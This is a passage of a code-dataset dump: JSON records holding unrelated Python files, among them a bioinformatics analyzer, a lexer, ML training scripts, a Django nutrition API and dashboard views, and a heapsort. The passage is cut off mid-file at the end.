ProcessInfo\nfrom Src.Core.Entity.Status import Status\n\n\nclass GlobalMessengerRnaDifferentialAnalyzer(GlobalDifferentialAnalyzerBase[int, GeneExpressionLevelDto]):\n \"\"\"description of class\"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n self.__manager = GlobalDifferentialMessengerRnaSampleManager()\n self.__measurer = GlobalRsemNormalizedCountMeasurer()\n\n def execute(self, values: Dict[int, List[GeneExpressionLevelDto]]) -> ProcessInfo:\n \"\"\"\n \n :param values: \n :return: \n \"\"\"\n diff_analysis_info = None\n\n try:\n diff_sample = GlobalDifferentialSampleDto(\n values=[self.__measurer.calculate(id_entrez,\n [l.case_value for l in levels],\n [l.control_value for l in levels])\n for id_entrez, levels in values.items()])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in calculating the global differential analysis in the messenger RNA samples.')])\n\n if diff_analysis_info:\n return diff_analysis_info\n\n try:\n self.__manager.add_one(diff_sample)\n diff_analysis_info = ProcessInfo(status=Status.OK,\n message='Global differential analysis for messenger RNA samples has been successful. See details to more information.',\n details=['{0}. {1}'.format(Status.OK.name,\n 'Global differential analysis for messenger RNA samples has executed and saved in the system.')])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in saving the global differential analysis for messenger RNA samples in the system.')])\n\n return diff_analysis_info","sub_path":"Src/BioAnalyzer/Analysis/GenePrioritization/Steps/DifferentialAnalysis/Analyzers/GlobalMessengerRnaDifferentialAnalyzer.py","file_name":"GlobalMessengerRnaDifferentialAnalyzer.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"354773872","text":"\nfrom aganlab.databases import connect_strs, getDatabaseAPIs\n\nfrom aganlab.databases.local_nlp import Doc2VecModelReference\nfrom aganlab.databases.remote_stock import RecoCom\n\nfrom aganlab.sim_stocks.testing import most_similar, usable_stock\n\nimport datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef redirector(result):\n container = { 'all': [], 'A股': [], '三板股':[] }\n for code, _, _, market, _ in result:\n container['all'].append(code)\n container[market].append(code)\n for index, ls in container.items():\n container[index] = ','.join(ls)\n reco_all = container['all']\n reco_ashare = container['A股']\n reco_oc = container['三板股']\n return reco_all, reco_ashare, reco_oc\n\ndef __main__(doc2vec_id):\n _, _, sess_scope_local_nlp = getDatabaseAPIs(connect_strs['local_nlp'])\n _, _, sess_scope_remote_a = getDatabaseAPIs(connect_strs['remote_a_shares'])\n _, _, sess_scope_stock = getDatabaseAPIs(connect_strs['remote_stock'])\n\n with sess_scope_local_nlp() as sess_local_nlp, sess_scope_remote_a() as sess_remote_a, sess_scope_stock() as sess_stock:\n doc2vec = sess_local_nlp.query(Doc2VecModelReference).filter_by(id_=doc2vec_id).first().load_model()\n # all_codes = [\n # code for code in doc2vec.docvecs.doctags.keys()\n # if code not in existed\n # ]\n all_codes = doc2vec.docvecs.doctags.keys()\n for code in all_codes:\n result = most_similar(sess_remote_a, sess_local_nlp, doc2vec, code, fast_mode=True)\n reco_all, reco_ashare, reco_oc = redirector(result)\n reco_com = RecoCom(\n code = code,\n reco_codes_all = reco_all,\n reco_codes_neeq = reco_oc,\n reco_codes_astock = reco_ashare,\n update_time = datetime.datetime.now()\n )\n\n sess_stock.merge(reco_com)\n sess_stock.commit()\n","sub_path":"sim_stocks/writing.py","file_name":"writing.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"268227681","text":"import ply.lex as lex\n\n\ntokens = (\n\t'INTEGER',\n\t'STRING',\n\t'PLUS',\n\t'MINUS',\n\t'TIMES',\n\t'DIVIDE',\n\t'MODULO',\n\t'LPAREN',\n\t'RPAREN',\n)\n\n\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_MODULO = r'%'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\n\nt_ignore = ' \\t\\n\\r'\n\ndef t_INTEGER(t):\n\tr'0|[1-9]\\d*'\n\tt.value = int(t.value)\n\treturn t\n\ndef t_STRING(t):\n\tr\"'(\\.|[^'])*'\"\n\tt.value = str(t.value[1:-1])\n\treturn t\n\ndef t_error(t):\n\tprint('illegal token: \"{}\"'.format(t.value[0]))\n\nlex.lex()\n\n\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"11038976","text":"# Configuration file for ipython.\nc = get_config()\n\n#------------------------------------------------------------------------------\n# TerminalInteractiveShell(InteractiveShell) configuration\n#------------------------------------------------------------------------------\n\n## Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,\n# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a\n# direct exit without any confirmation.\nc.TerminalInteractiveShell.confirm_exit = False\n\n## Shortcut style to use at the prompt. 'vi' or 'emacs'.\nc.TerminalInteractiveShell.editing_mode = 'vi'\n\n## Set the color scheme (NoColor, Neutral, Linux, or LightBG).\nc.InteractiveShell.colors = 'Neutral'\n\n## Use 24bit colors instead of 256 colors in prompt highlighting. If your\n# terminal supports true color, the following command should print 'TRUECOLOR'\n# in orange: printf \"\\x1b[38;2;255;100;0mTRUECOLOR\\x1b[0m\\n\"\nc.TerminalInteractiveShell.true_color = True\n","sub_path":"python/.ipython/profile_default/ipython_config.py","file_name":"ipython_config.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"58193997","text":"#工具准备\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import scale\r\nimport numpy as np\r\n\r\n#函数准备\r\ndef model(w, x, b):\r\n return x @ w + b\r\n\r\ndef loss(x, y, w, b):\r\n err = y - model(w, x, b)\r\n return tf.reduce_mean(tf.square(err))\r\n\r\ndef gard(x, y, w, b):\r\n with tf.GradientTape() as tape:\r\n loss_ = loss(x, y, w, b)\r\n return tape.gradient(loss_, [w, b])\r\n\r\n#数据准备\r\nbuston = tf.keras.datasets.boston_housing\r\n(x_train, y_train), (x_test, y_test) = buston.load_data()\r\nx_train, x_test = tf.cast(scale(x_train), tf.float32), tf.cast(scale(x_test), tf.float32)\r\n\r\n#模型准备\r\nw = tf.Variable(tf.random.normal([13, 1], mean=0, stddev=1.), dtype=tf.float32)\r\nb = tf.Variable(tf.zeros(1), dtype=tf.float32)\r\ntrain_epochs = 50\r\nlearning_rate = 0.001\r\nbatch_size = 10\r\noptimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n#模型训练\r\nfor epoch in range(train_epochs):\r\n for step in range(int(len(x_train) / batch_size)):\r\n xs = x_train[step * batch_size:(step + 1) * batch_size]\r\n ys = y_train[step * batch_size:(step + 1) * batch_size]\r\n\r\n gards = gard(xs, ys, w, b)\r\n optimizer.apply_gradients(zip(gards, [w, b]))\r\n\r\n train_loss = loss(x_train, y_train, w, b) # 当前轮次总的损失\r\n print(\"epoch:{:3d},train_loss:{:.4f}\".format(epoch, train_loss))\r\n#训练结果\r\nprint('w:',w.numpy().transpose(), '\\nb:', b.numpy())\r\nnp.random.seed(int(np.random.rand()*1000))\r\nhouse_id = np.random.randint(0, len(x_test))\r\nprint('testNum',len(x_test))\r\npre = model(w, x_test, b)[house_id]\r\nprint(\"第{}条数据,预测值:{:.4f},实际值:{}\".format(house_id, pre[0], y_test[house_id]))","sub_path":"第七周作业/boston.py","file_name":"boston.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274072828","text":"import sklearn.svm\r\nimport numpy\r\nimport argparse\r\n\r\n\r\ndef parse_file(file):\r\n\tf = open(file, 'r+')\r\n\tsamples = [(line[-1] == '\\n' and line[:-1] or line).decode('utf-8').split('\\t') for line in f if line[0] != '#']\r\n\tfeatures = [[int(feature) for feature in sample[1:]] for sample in samples]\r\n\tclasses = [(sample[0] == u\"male\" and 1 or -1) for sample in samples]\r\n\treturn features, classes\r\n\r\n\t\r\ndef get_features(files):\r\n\tfeatures = []\r\n\tclasses = []\r\n\tfor file in files:\r\n\t\tfile_features, file_classes = parse_file(file)\r\n\t\tfeatures.extend(file_features)\r\n\t\tclasses.extend(file_classes)\r\n\treturn features, classes\r\n\t\r\n\t\r\ndef parse_args():\r\n\tparser = argparse.ArgumentParser(description = 'SVM friends gender predictor')\r\n\tparser.add_argument('input_files', metavar='IN', type=str, nargs='+', help='input files to use')\r\n\treturn parser.parse_args()\r\n\r\n\t\t\r\nclass GenderPredictor(object):\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.clf = sklearn.svm.SVC()\r\n\t\t\r\n\tdef fit(self, features, classes):\r\n\t\tself.clf.fit(features, classes)\r\n\t\t\r\n\tdef predict(self, features):\r\n\t\treturn self.clf.predict(features).tolist()\r\n\t\t\r\n\tdef test(self, predictions, classes):\r\n\t\tprint(\"Predicted classes:\")\r\n\t\tprint(predictions)\r\n\t\tprint(\"Real classes:\")\r\n\t\tprint(classes)\r\n\t\tsucceed = len([prediction for prediction, clas in zip(predictions, classes) if prediction == clas])\r\n\t\ttotal = len(classes)\r\n\t\taccuracy = 1.0 * succeed / total * 100\r\n\t\tprint(\"Accuracy: \"\t+ str(succeed) + \" succeed of \" + str(total) + \" total (\" + str(accuracy) + \"%)\")\r\n\t\treturn accuracy\r\n\r\n\tdef split_for_testing(self, features, classes):\r\n\t\tprint (len(classes))\r\n\t\ttests = len(classes) / 4\r\n\t\treturn ({\"features\":features[tests:], \"classes\":classes[tests:]},\r\n\t\t\t\t{\"features\":features[:tests], \"classes\":classes[:tests]})\r\n\r\ndef main():\r\n\targs = parse_args()\r\n\tfeatures, classes = get_features(args.input_files)\r\n\tmodel = GenderPredictor()\r\n\ttrainers, testers = model.split_for_testing(features, classes)\r\n\tmodel.fit(trainers[\"features\"], trainers[\"classes\"])\r\n\tpredictions = model.predict(testers[\"features\"])\r\n\tmodel.test(predictions, testers[\"classes\"])\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"fb_svm/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"362936507","text":"#Time:O(m+n)\r\n#Space:O(m+n) for m vertices and n edges\r\nclass Solution:\r\n def findJudge(self, n: int, trust: List[List[int]]) -> int:\r\n indegree = [0]*(n+1)\r\n outdegree = [0]*(n+1)\r\n for out_val,in_val in trust:\r\n indegree[in_val]+=1\r\n outdegree[out_val]+=1\r\n for i in range(1,n+1):\r\n if indegree[i]==n-1:\r\n if outdegree[i]==0:\r\n return i\r\n return -1","sub_path":"Town_Judge.py","file_name":"Town_Judge.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316742786","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import gridspec\nimport matplotlib.ticker as mtick\n\n\ndef grids():\n \"\"\"Applies aesthetic gridding to a subplot axis.\"\"\"\n\n ax.minorticks_on()\n ax.tick_params('y', length=8, which='major', labelsize='10')\n ax.tick_params('y', length=3, which='minor')\n ax.tick_params('x', which='both', bottom=False, top=False)\n ax.set_axisbelow(True)\n ax.grid(True, which='major', ls='-', lw=.5, alpha=0.75, zorder=0, color='lightgray')\n ax.grid(True, which='minor', ls=':', alpha=.15, zorder=0, color='lightgray')\n\n\ndef spines():\n for spine in ax.spines.values():\n spine.set_visible(False)\n\n\ndef ticks():\n ax.tick_params(which='both', top=False, left=False, right=False, bottom=False)\n\n\ndef set_gridspec(widths, heights, wspace=0, hspace=0):\n fig = plt.figure(figsize=(sum(widths) + wspace * (len(widths) - 1),\n sum(heights) + hspace * (len(heights) - 1)))\n gs = gridspec.GridSpec(len(heights), len(widths),\n height_ratios=heights, width_ratios=widths)\n return fig, gs\n\n\ndef getPayrollData(year, job_title):\n df = pd.read_csv(f\"payroll data/santa-cruz-{year}.csv\")\n df_stats = df.loc[df['Job Title'].str.lower()==job_title.lower()].describe()\n return df_stats\n\npayroll_years = range(2011, 2019)\npayroll_data = {year: getPayrollData(year, 'Police Officer') for year in payroll_years}\n\n\n# Initializing figure.\nfig, gs = set_gridspec(widths=[15], heights=[7, 1, 7])\n\n# First figure\nax = fig.add_subplot(gs[0])\ngrids(); spines()\nax.set_facecolor('ghostwhite')","sub_path":"police_payroll.py","file_name":"police_payroll.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"321498311","text":"from PyQt5.QtWidgets import QDialog, QTreeWidget, QTreeWidgetItem, QLineEdit, QVBoxLayout, QPushButton, QHBoxLayout, QStyle\n\nfrom utils.ViewUtils import FilterTreeBySearchText\n\nclass LogicSelectDialog(QDialog):\n def __init__(self, logicsModel):\n super().__init__()\n\n self._resultLogic = None\n self._currentSelection = None\n\n self._rootLayout = QVBoxLayout()\n\n self._searchLine = QLineEdit()\n self._searchLine.setPlaceholderText(\"Search...\")\n self._searchLine.setClearButtonEnabled(True)\n self._searchLine.textChanged.connect(self._signal_searchLine_textChanged)\n self._rootLayout.addWidget(self._searchLine)\n\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._tree.invisibleRootItem(), logicsModel.getLogics())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._addBt = QPushButton(\"Add\")\n self._addBt.clicked.connect(self._signal_addBt_clicked)\n self._addBt.setEnabled(False)\n self._buttotLayout.addWidget(self._addBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity Logic\")\n\n def _buildTree(self, rootItem, moduleLogics):\n for module in moduleLogics:\n moduleItem = QTreeWidgetItem(rootItem)\n moduleItem.setText(0, module.getName())\n moduleItem.setIcon(0, self.style().standardIcon(QStyle.SP_DirIcon))\n for logic in module.getLogics():\n item = QTreeWidgetItem(moduleItem)\n item.setText(0, logic.getName())\n item._node = logic\n\n def _signal_cancelBt_clicked(self):\n self._resultLogic = None\n self.done(0)\n\n def _signal_addBt_clicked(self):\n self._resultLogic = self._currentSelection\n self.done(0)\n\n def _signal_searchLine_textChanged(self, text):\n FilterTreeBySearchText(self._tree, text)\n\n def getResultLogic(self):\n return self._resultLogic\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n if hasattr(currItem, \"_node\"):\n self._currentSelection = currItem._node\n self._addBt.setEnabled(True)\n return\n self._currentSelection = None\n self._addBt.setEnabled(False)","sub_path":"Sources/Editor/App/dialog/LogicSelecDialog.py","file_name":"LogicSelecDialog.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308769753","text":"# Initialization.py\n# Copyright (c) 2018 PDFix. All Rights Reserved.\n\n## \n# \\page Python_Samples Python Samples\n# -\\subpage Initialization_py \n# \\page Initialization_py Initialization Sample\n# Example how to initialize PDFix SDK in python.\n# \\snippet /Initialization.py Initialization_py\n#\n\n##\n#\\cond INTERNAL\n#! [Initialization_py]\nimport sys, os\nimport Utils\nfrom Pdfix import *\n\ndef Initialization(email, key):\n print('Pdfix Initialization Sample')\n\n pdfix = GetPdfix()\n if pdfix is None:\n raise Exception('Pdfix Initialization fail')\n\n # check version\n major = pdfix.GetVersionMajor()\n minor = pdfix.GetVersionMinor()\n patch = pdfix.GetVersionPatch()\n print(\"PDFix SDK Version \" + str(major) + \".\" + str(minor) + \".\" + str(patch))\n\n # authorization\n if not pdfix.Authorize(email, key):\n raise Exception('Authorization fail : ' + pdfix.GetError())\n\n # some code to execute\n\n # cleanup\n pdfix.Destroy()\n\ntry:\n # pdfix initialization\n email = Utils.getEmail() # email address\n licenseKey = Utils.getLicenseKey() # license key\n cwd = os.getcwd() + \"/\" # current working directory\n\n # pdfix initialization\n Pdfix_init(cwd + Utils.getModuleName('pdfix'))\n\n Initialization(email, licenseKey)\n\n Pdfix_destroy()\n\nexcept Exception as e:\n print('Oops! ' + str(e))\n\n## \n#! [Initialization_py]\n# \\endcond\n","sub_path":"public/Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"432266898","text":"# coding=utf-8\nfrom django import forms\nfrom django_summernote.widgets import SummernoteWidget\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n class Meta:\n model = Article\n fields = [\n \"title\",\n \"image\",\n \"content\",\n \"draft\",\n \"publish\",\n ]\n widgets = {\n \"content\": SummernoteWidget(),\n }\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(max_length=100, label='Búsqueda')\n","sub_path":"articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"604299585","text":"import numpy as np\nfrom scipy import linalg\n\nEPSILON = 1e-6\n\nclass WorldDiffusionSystem(object):\n def __init__(self, patch_map, linear_solver):\n self.patch_map = patch_map\n self.compound_total_amount = np.sum(patch_map.compute_repartition_vector())\n self.solver = linear_solver\n\n def __str__(self):\n return \"#\"*5+\" WORLD DIFFUSION SYSTEM \"+\"#\"*5+\"\\n\"+\\\n \"Solver: {}\\n\".format(self.solver)+\\\n str(self.patch_map)\n\n def compute_new_repartition(self, compound_total_amount, production_vector):\n C = self.patch_map.compute_speed_matrix()\n C_inversed = self.patch_map.compute_inverted_speed_matrix()\n\n M = np.matmul(self.patch_map.links_matrix, C)\n P = production_vector\n\n X_0 = self.solver.solve(np.matmul(M,M), -np.matmul(M,P))\n\n # Find *non-zero* solution to MY = 0\n M_eigenvalues, M_eigenvectors = np.linalg.eig(M)\n M_eigenpairs = [(value, M_eigenvectors[:,i]) for i, value in enumerate(M_eigenvalues)]\n Y_0 = [vector for (value, vector) in M_eigenpairs if abs(value) < EPSILON][0]\n\n\n lambda_value = (compound_total_amount - np.sum(X_0))/np.sum(Y_0)\n new_repartition = X_0 + lambda_value * Y_0\n\n return new_repartition\n\n def update_production(self, new_production_vector):\n self.patch_map.update_production(new_production_vector)\n\n def make_step(self, time_elapsed):\n production_vector = self.patch_map.compute_production_vector()\n\n compound_total_production = np.sum(production_vector)\n initial_compound_amount = np.sum(self.patch_map.compute_repartition_vector())\n compound_total_amount = initial_compound_amount + time_elapsed * compound_total_production\n\n new_repartition = self.compute_new_repartition(compound_total_amount, production_vector)\n\n for i, patch in enumerate(self.patch_map.patches):\n patch.compound_amount = new_repartition[i]\n","sub_path":"World_Compound_Diffusion_Model/world_diffusion_system.py","file_name":"world_diffusion_system.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"510885505","text":"import io\nimport sys\n\ndef heapify(arr, n, i):\n root = i\n l = 2*i+1\n r = 2*i+2\n if l < n and arr[i] < arr[l]:\n root = l\n if r < n and arr[root] < arr[r]:\n root = r\n if root != i:\n arr[i],arr[root] = arr[root],arr[i]\n heapify(arr, n, root)\n\ndef heapSort(arr):\n n = len(arr)\n for i in range(n, -1, -1):\n heapify(arr, n, i)\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n\n\ndef main():\n inp = sys.stdin\n out = sys.stdout\n n = inp.readline()\n a = inp.readline().split('\\n')[0].split(' ')\n arr = []\n for i in a:\n arr.append(int(i))\n heapSort(arr)\n print(\"{}\".format(arr))\n\nif __name__==\"__main__\":\n main()","sub_path":"Q1/heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156104490","text":"import json\nimport ssl\nimport requests\n\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\ncontext = ssl._create_unverified_context()\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_calories(request):\n profile = request.user.profile\n data = {\n \"query\": request.query_params.get('query'),\n \"gender\": 'male',\n \"weight_kg\": profile.weight / 2.205,\n \"height_cm\": profile.height,\n \"age\": profile.age\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/exercise', data)\n obj = json.loads(a.text)\n\n total_calories = 0\n exercises = []\n for exercise in obj['exercises']:\n total_calories += exercise['nf_calories']\n exercises.append(exercise['name'])\n return Response({\n 'calories': total_calories,\n 'exercises': exercises\n })\n\n return Response({})\n\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_nutrients(request):\n data = {\n \"query\": request.query_params.get('query'),\n \"timezone\": \"PDT\"\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/nutrients', data)\n obj = json.loads(a.text)\n\n total_calories, total_fat, total_carb, total_protein = 0, 0, 0, 0\n ingredients = []\n for ingredient in obj['foods']:\n total_calories += ingredient['nf_calories']\n total_carb += ingredient['nf_total_carbohydrate']\n total_fat += ingredient['nf_total_fat']\n total_protein += ingredient['nf_protein']\n\n ingredients.append({\n \"name\": ingredient['food_name'],\n \"quantity\": ingredient['serving_qty'],\n \"protein\": ingredient['nf_protein'],\n \"carb\": ingredient['nf_total_carbohydrate'],\n \"fat\": ingredient['nf_total_fat'],\n \"calories\": ingredient['nf_calories']\n })\n return Response({\n 'calories': total_calories,\n 'fat': total_fat,\n 'carb': total_carb,\n 'protein': total_protein,\n 'foods': ingredients\n })\n\n return Response({})\n\n\ndef prepare_nutritionix_request(url, data=None):\n headers = {\n 'x-app-id': settings.NUTRIONIX_APP_ID,\n 'x-app-key': settings.NUTRIONIX_APP_KEY,\n 'x-remote-user-id': settings.NUTRIONIX_USER_ID,\n 'x-user-jwt': settings.NUTRIONIX_TOKEN\n }\n\n if data is not None:\n r = requests.post(settings.NUTRIONIX_URL + url, data, headers=headers)\n else:\n r = requests.get(settings.NUTRIONIX_URL + url, headers=headers)\n return r\n\n\ndef is_connected(response):\n return True","sub_path":"global_api/functions_view.py","file_name":"functions_view.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"321618283","text":"import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('10.11.112.137', 666))\n\nwhile True:\n\n sock.listen(5)\n clientsocket, address = sock.accept()\n print(f'New connection from {address} has been established')\n clientsocket.send(b'Welcome to the server')\n clientsocket.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"474779662","text":"import logging\n\ntry:\n import torch\n from transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nexcept ImportError:\n # No installation required if not using this function\n pass\n\nfrom nlpaug.model.lang_models import LanguageModels\n\nimport nlpaug.util.text.tokenizer as text_tokenizer\n\n\nclass T5(LanguageModels):\n # https://arxiv.org/pdf/1910.10683.pdf\n\n def __init__(self, model_path='t5-base', min_length=10, max_length=20, num_beam=3, no_repeat_ngram_size=3, \n device='cuda', silence=True):\n super().__init__(device, temperature=None, top_k=None, top_p=None, silence=True)\n try:\n import transformers\n except ModuleNotFoundError:\n raise ModuleNotFoundError('Missed transformers library. Install transfomers by `pip install transformers`')\n\n self.model_path = model_path\n self.min_length = min_length\n self.max_length = max_length\n self.num_beam = num_beam\n self.no_repeat_ngram_size = no_repeat_ngram_size\n\n self.tokenizer = AutoTokenizer.from_pretrained(model_path)\n if silence:\n # Transformers thrown an warning regrading to weight initialization. It is expected\n orig_log_level = logging.getLogger('transformers.' + 'modeling_utils').getEffectiveLevel()\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(logging.ERROR)\n self.model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(orig_log_level)\n\n self.model.to(self.device)\n self.model.eval()\n\n self.text_prefix = 'summarize: '\n self.return_tensor = 'pt' # PyTorch\n self.early_stopping = True\n self.skip_special_token = True\n self.default_max_length_ratio = 0.5\n\n def predict(self, text, n=1):\n # Convert to feature\n token_ids = self.tokenizer.encode(self.text_prefix + text, return_tensors=self.return_tensor)\n\n # Prediction\n min_length = self.get_min_length(text)\n max_length = self.get_max_length(text)\n target_token_ids = self.model.generate(token_ids,\n min_length=min_length, max_length=max_length, num_beams=self.num_beam,\n no_repeat_ngram_size=self.no_repeat_ngram_size)\n\n tokens = self.tokenizer.decode(target_token_ids[0], skip_special_tokens=self.skip_special_token)\n\n # Return full sentence only.\n for i in range(len(tokens)-1, -1, -1):\n if tokens[i] in text_tokenizer.SENTENCE_SEPARATOR:\n return tokens[:i+1]\n\n return tokens\n\n def get_min_length(self, text):\n return int(len(text) * self.min_length) if self.min_length < 1 else self.min_length\n\n def get_max_length(self, text):\n if self.max_length < 1:\n return int(len(text) * self.max_length)\n else:\n if len(text) >= self.max_length:\n return int(len(text) * self.default_max_length_ratio)\n else:\n return self.max_length\n","sub_path":"nlpaug/model/lang_models/t5.py","file_name":"t5.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"532102261","text":"from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext,loader,Context\nimport Query\nimport Constant\nimport dummydata\nfrom gaesessions import get_current_session\nimport logging\nfrom google.appengine.ext import ndb\ndef get_not_recently_loggedin(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlydict =Query.get_students_not_logged_in_by_class(teacherkey)\n logging.error('sbxjks' )\n logging.error(notrecentlydict)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlylogin': notrecentlydict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef mastery_by_student_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n mastery_by_student = Query.get_mastery_by_student_of_class(teacherkey)\n\n t = loader.get_template('Dashboard/teacher_mastery_by_student')\n c = Context({'mastery_by_student':mastery_by_student ,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_not_recently_loggedin_all(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlyloggedin = Query.get_students_not_logged_in_of_all_class(teacherkey)\n logging.error(notrecentlyloggedin)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlyloginall': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallclass(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n averagemasterybysubject = Query.get_average_mastery_by_subject_of_all_class(teacherkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allclass.xml')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_classes_of_teacher(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n classdetails = Query.get_class_details_of_teacher(teacherkey)\n\n t = loader.get_template('Dashboard/getclassdetails_byteacher')\n c = Context({'getclassdetailsdict': classdetails,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_students_not_logged_in_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n notrecentlyloggedin = Query.get_students_not_logged_in_by_class(teacherkey,classkey)\n\n t = loader.get_template('Dashboard/notrecentlyloggedin_byclass')\n c = Context({'notrecentlyloggedinbyclass': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallsubject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n averagemasterybysubject = Query.get_average_mastery_all_subject_detailed(teacherkey,classkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allsubject')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_assessment_coverage_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_class(teacherkey,classkey)\n logging.error(\"&&&&&&&&&&&&&&&&&&777\"+str(assessmentcoveragedict))\n t = 